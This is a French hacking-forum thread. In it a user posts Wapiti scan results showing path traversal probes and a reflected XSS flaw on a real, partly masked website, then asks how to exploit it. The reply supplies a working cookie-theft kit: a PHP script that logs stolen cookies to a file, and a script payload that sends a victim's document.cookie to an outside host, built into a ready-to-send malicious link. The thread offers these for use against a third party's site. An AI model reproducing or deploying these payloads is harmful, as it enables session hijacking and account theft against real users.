Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 11-08-2009 09:11:18

mikael8313
Membre
Inscription : 11-08-2009
Messages : 19

Faille XSS TROUVER

Bonjour ,  je viens de scanner un site web et il me semble que j'ai déceler une faille xss j'ai utilisé wapiti  pour scanner et voici son resultat

Attacking forms (POST)...
-------------------------
500 HTTP Error code in http://www...../fr/mailing.cfm
  with params = f_s_email_mailing=%2Fetc%2Fpasswd%00
  coming from http://www......com/fr/index.cfm/
500 HTTP Error code in http://www........com/fr/mailing.cfm
  with params = f_s_email_mailing=c%3A%5C%5Cboot.ini%00
  coming from http://www.......com/fr/index.cfm/
500 HTTP Error code in http://www.........com/fr/mailing.cfm
  with params = f_s_email_mailing=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
  coming from http://www.......com/fr/index.cfm/
500 HTTP Error code in http://www........com/fr/mailing.cfm
  with params = f_s_email_mailing=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00
  coming from http://www........com/fr/index.cfm/
500 HTTP Error code in http://www.........com/fr/mailing.cfm
  with params = f_s_email_mailing=%2Fe%00
  coming from http://www..........com/fr/index.cfm/
500 HTTP Error code in http://www........com/fr/mailing.cfm
  with params = f_s_email_mailing=%BF%27%22%28
  coming from http://www........com/fr/index.cfm/
Found XSS in http://www........com/fr/mailing.cfm
  with params = f_s_email_mailing=%3Cscript%3Evar+wapiti_687474703a2f2f7777772e7a6f75616768692d6361636865722e636f6d2f66722f6d61696c696e672e63666d_665f735f656d61696c5f6d61696c696e67%3Dnew+Boolean%28%29%3B%3C%2Fscript%3E
  coming from http://www........com/fr/index.cfm/

Looking for permanent XSS
-------------------------



Je pense que la derniere il a trouver une faille XSS mais ensuite je ne sais pas quoi faire pour allez plus loin je dois creer un script ? et ensuite l'injecter?


Merci de vos réponse

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-09-2009 10:36:16

k3vin mitnick
Membre Actif
Inscription : 21-09-2009
Messages : 28

Re : Faille XSS TROUVER

smile  voila  un tuto  sur  XSS attaque http://www.metacafe.com/watch/2127867/i … ss_part_1/   aussi voila les tool utilisé dans ce type attaque :

[c]<?php
$cookie = $_GET["cyb"];
if(isset($cookie))
{
$fp = fopen("k3vin.txt","a+");
fwrite($fp,$cookie . "\r\n");
fclose($fp);
}
?>

<script>
location.replace("http://google.fr");
</script>[/c]


puis il reste  envoyer  ce petit code a notre victime :

[c]<script>location.href="http://.........com/cookies.php?cyb="+document.cookie</script>[/c]
[c]
lien final : www.XXXXX.fr/index.php?x=<script>location.href="http://.........com/cookies.php?cyb="+document.cookie</script>[/c]


bannerpf.jpg

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.02 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]